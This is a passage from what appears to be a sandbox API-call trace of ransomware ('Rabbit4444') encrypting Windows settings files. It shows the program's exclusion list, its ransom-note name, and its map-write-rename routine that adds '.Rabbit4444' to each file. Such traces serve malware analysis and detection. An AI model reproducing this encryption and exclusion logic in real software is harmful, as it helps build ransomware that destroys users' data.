(lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Start_ShowSuggestedAppsGroup.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.011] lstrlenW (lpString="AAA_SystemSettings_Start_ShowSuggestedAppsGroup.settingcontent-ms") returned 65 [0058.011] lstrlenW (lpString="Rabbit4444") returned 10 [0058.011] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.011] lstrlenW (lpString=".dll") returned 4 [0058.012] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.012] lstrlenW (lpString=".lnk") returned 4 [0058.012] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.012] lstrlenW (lpString=".ini") returned 4 [0058.012] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.012] lstrlenW (lpString=".sys") returned 4 [0058.012] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.012] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Start_ShowSuggestedAppsGroup.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_start_showsuggestedappsgroup.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.012] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.012] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14932277477) returned 1 [0058.012] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1265) returned 1 [0058.012] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1178d8 [0058.012] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1016b0 [0058.012] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x800, lpName=0x0) returned 0x298 [0058.013] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x800) returned 0x70000 [0058.014] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.014] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0058.014] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.014] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0058.014] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.014] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0058.014] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.014] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0058.015] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14932528598) returned 1 [0058.015] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1178d8 | out: hHeap=0xe0000) returned 1 [0058.015] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1016b0 | out: hHeap=0xe0000) returned 1 [0058.015] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.015] CloseHandle (hObject=0x298) returned 1 [0058.015] CloseHandle (hObject=0x278) returned 1 [0058.015] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Start_ShowSuggestedAppsGroup.settingcontent-ms.Rabbit4444") returned 193 [0058.015] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Start_ShowSuggestedAppsGroup.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_start_showsuggestedappsgroup.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Start_ShowSuggestedAppsGroup.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_start_showsuggestedappsgroup.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.016] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3a52f9bd, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x3a52f9bd, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2340c766, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x497, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Start_Size.settingcontent-ms", cAlternateFileName="AA68F4~1.SET")) returned 1 [0058.016] lstrcmpiW (lpString1="AAA_SystemSettings_Start_Size.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.016] lstrcmpiW (lpString1="AAA_SystemSettings_Start_Size.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.016] lstrcmpiW (lpString1="AAA_SystemSettings_Start_Size.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.016] lstrcmpiW (lpString1="AAA_SystemSettings_Start_Size.settingcontent-ms", lpString2=".") returned 1 [0058.016] lstrcmpiW (lpString1="AAA_SystemSettings_Start_Size.settingcontent-ms", lpString2="..") returned 1 [0058.016] lstrcmpiW (lpString1="AAA_SystemSettings_Start_Size.settingcontent-ms", lpString2="windows") returned -1 [0058.016] lstrcmpiW (lpString1="AAA_SystemSettings_Start_Size.settingcontent-ms", lpString2="bootmgr") returned -1 [0058.016] lstrcmpiW (lpString1="AAA_SystemSettings_Start_Size.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.016] lstrcmpiW (lpString1="AAA_SystemSettings_Start_Size.settingcontent-ms", lpString2="boot") returned -1 [0058.016] lstrcmpiW (lpString1="AAA_SystemSettings_Start_Size.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.016] lstrcmpiW (lpString1="AAA_SystemSettings_Start_Size.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.016] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Start_Size.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Start_Size.settingcontent-ms") returned="AAA_SystemSettings_Start_Size.settingcontent-ms" [0058.016] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Start_Size.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.016] lstrlenW (lpString="AAA_SystemSettings_Start_Size.settingcontent-ms") returned 47 [0058.016] lstrlenW (lpString="Rabbit4444") returned 10 [0058.016] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.016] lstrlenW (lpString=".dll") returned 4 [0058.016] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.016] lstrlenW (lpString=".lnk") returned 4 [0058.016] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.017] lstrlenW (lpString=".ini") returned 4 [0058.017] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.017] lstrlenW (lpString=".sys") returned 4 [0058.017] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.017] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Start_Size.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_start_size.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.017] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.017] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14932869557) returned 1 [0058.018] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1175) returned 1 [0058.018] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0058.018] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0058.018] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7a0, lpName=0x0) returned 0x298 [0058.019] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7a0) returned 0x70000 [0058.020] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.020] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0058.020] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.020] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0058.020] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.020] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0058.020] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.020] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0058.020] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14933118656) returned 1 [0058.020] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0058.021] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0058.021] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.021] CloseHandle (hObject=0x298) returned 1 [0058.021] CloseHandle (hObject=0x278) returned 1 [0058.021] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Start_Size.settingcontent-ms.Rabbit4444") returned 175 [0058.021] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Start_Size.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_start_size.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Start_Size.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_start_size.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.021] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3a6d3408, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x3a6d3408, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2394398e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4bf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Start_StoreMFUApps.settingcontent-ms", cAlternateFileName="AAC335~1.SET")) returned 1 [0058.022] lstrcmpiW (lpString1="AAA_SystemSettings_Start_StoreMFUApps.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.022] lstrcmpiW (lpString1="AAA_SystemSettings_Start_StoreMFUApps.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.022] lstrcmpiW (lpString1="AAA_SystemSettings_Start_StoreMFUApps.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.022] lstrcmpiW (lpString1="AAA_SystemSettings_Start_StoreMFUApps.settingcontent-ms", lpString2=".") returned 1 [0058.022] lstrcmpiW (lpString1="AAA_SystemSettings_Start_StoreMFUApps.settingcontent-ms", lpString2="..") returned 1 [0058.022] lstrcmpiW (lpString1="AAA_SystemSettings_Start_StoreMFUApps.settingcontent-ms", lpString2="windows") returned -1 [0058.022] lstrcmpiW (lpString1="AAA_SystemSettings_Start_StoreMFUApps.settingcontent-ms", lpString2="bootmgr") returned -1 [0058.022] lstrcmpiW (lpString1="AAA_SystemSettings_Start_StoreMFUApps.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.022] lstrcmpiW (lpString1="AAA_SystemSettings_Start_StoreMFUApps.settingcontent-ms", lpString2="boot") returned -1 [0058.022] lstrcmpiW (lpString1="AAA_SystemSettings_Start_StoreMFUApps.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.022] lstrcmpiW (lpString1="AAA_SystemSettings_Start_StoreMFUApps.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.022] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Start_StoreMFUApps.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Start_StoreMFUApps.settingcontent-ms") returned="AAA_SystemSettings_Start_StoreMFUApps.settingcontent-ms" [0058.022] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Start_StoreMFUApps.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.022] lstrlenW (lpString="AAA_SystemSettings_Start_StoreMFUApps.settingcontent-ms") returned 55 [0058.022] lstrlenW (lpString="Rabbit4444") returned 10 [0058.022] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.022] lstrlenW (lpString=".dll") returned 4 [0058.022] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.022] lstrlenW (lpString=".lnk") returned 4 [0058.022] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.022] lstrlenW (lpString=".ini") returned 4 [0058.022] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.022] lstrlenW (lpString=".sys") returned 4 [0058.022] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.023] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Start_StoreMFUApps.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_start_storemfuapps.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.023] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.023] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14933355699) returned 1 [0058.023] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1215) returned 1 [0058.023] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117a40 [0058.023] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101ea8 [0058.023] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7c0, lpName=0x0) returned 0x298 [0058.024] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7c0) returned 0x70000 [0058.025] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.025] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0058.025] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.025] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0058.025] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.025] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0058.025] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.025] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0058.025] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14933599089) returned 1 [0058.025] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: hHeap=0xe0000) returned 1 [0058.025] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101ea8 | out: hHeap=0xe0000) returned 1 [0058.025] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.025] CloseHandle (hObject=0x298) returned 1 [0058.026] CloseHandle (hObject=0x278) returned 1 [0058.026] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Start_StoreMFUApps.settingcontent-ms.Rabbit4444") returned 183 [0058.026] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Start_StoreMFUApps.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_start_storemfuapps.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Start_StoreMFUApps.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_start_storemfuapps.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.026] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3a981e13, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x3a981e13, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2339a047, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4fb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Start_StoreRecentlyOpenedItems.settingcontent-ms", cAlternateFileName="AAC4D9~1.SET")) returned 1 [0058.026] lstrcmpiW (lpString1="AAA_SystemSettings_Start_StoreRecentlyOpenedItems.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.026] lstrcmpiW (lpString1="AAA_SystemSettings_Start_StoreRecentlyOpenedItems.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.026] lstrcmpiW (lpString1="AAA_SystemSettings_Start_StoreRecentlyOpenedItems.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.027] lstrcmpiW (lpString1="AAA_SystemSettings_Start_StoreRecentlyOpenedItems.settingcontent-ms", lpString2=".") returned 1 [0058.027] lstrcmpiW (lpString1="AAA_SystemSettings_Start_StoreRecentlyOpenedItems.settingcontent-ms", lpString2="..") returned 1 [0058.027] lstrcmpiW (lpString1="AAA_SystemSettings_Start_StoreRecentlyOpenedItems.settingcontent-ms", lpString2="windows") returned -1 [0058.027] lstrcmpiW (lpString1="AAA_SystemSettings_Start_StoreRecentlyOpenedItems.settingcontent-ms", lpString2="bootmgr") returned -1 [0058.027] lstrcmpiW (lpString1="AAA_SystemSettings_Start_StoreRecentlyOpenedItems.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.027] lstrcmpiW (lpString1="AAA_SystemSettings_Start_StoreRecentlyOpenedItems.settingcontent-ms", lpString2="boot") returned -1 [0058.027] lstrcmpiW (lpString1="AAA_SystemSettings_Start_StoreRecentlyOpenedItems.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.027] lstrcmpiW (lpString1="AAA_SystemSettings_Start_StoreRecentlyOpenedItems.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.027] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Start_StoreRecentlyOpenedItems.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Start_StoreRecentlyOpenedItems.settingcontent-ms") returned="AAA_SystemSettings_Start_StoreRecentlyOpenedItems.settingcontent-ms" [0058.027] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Start_StoreRecentlyOpenedItems.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.027] lstrlenW (lpString="AAA_SystemSettings_Start_StoreRecentlyOpenedItems.settingcontent-ms") returned 67 [0058.027] lstrlenW (lpString="Rabbit4444") returned 10 [0058.027] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.027] lstrlenW (lpString=".dll") returned 4 [0058.027] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.027] lstrlenW (lpString=".lnk") returned 4 [0058.027] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.027] lstrlenW (lpString=".ini") returned 4 [0058.027] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.027] lstrlenW (lpString=".sys") returned 4 [0058.027] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.027] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Start_StoreRecentlyOpenedItems.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_start_storerecentlyopeneditems.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.028] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.028] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14933852004) returned 1 [0058.028] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1275) returned 1 [0058.028] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0058.028] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0058.028] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x800, lpName=0x0) returned 0x298 [0058.029] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x800) returned 0x70000 [0058.030] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.030] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0058.030] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.030] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0058.030] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.030] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0058.030] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.030] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0058.030] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14934097631) returned 1 [0058.030] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0058.030] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0058.030] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.030] CloseHandle (hObject=0x298) returned 1 [0058.030] CloseHandle (hObject=0x278) returned 1 [0058.031] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Start_StoreRecentlyOpenedItems.settingcontent-ms.Rabbit4444") returned 195 [0058.031] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Start_StoreRecentlyOpenedItems.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_start_storerecentlyopeneditems.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Start_StoreRecentlyOpenedItems.settingcontent-ms.Rabbit4444" (normalized: 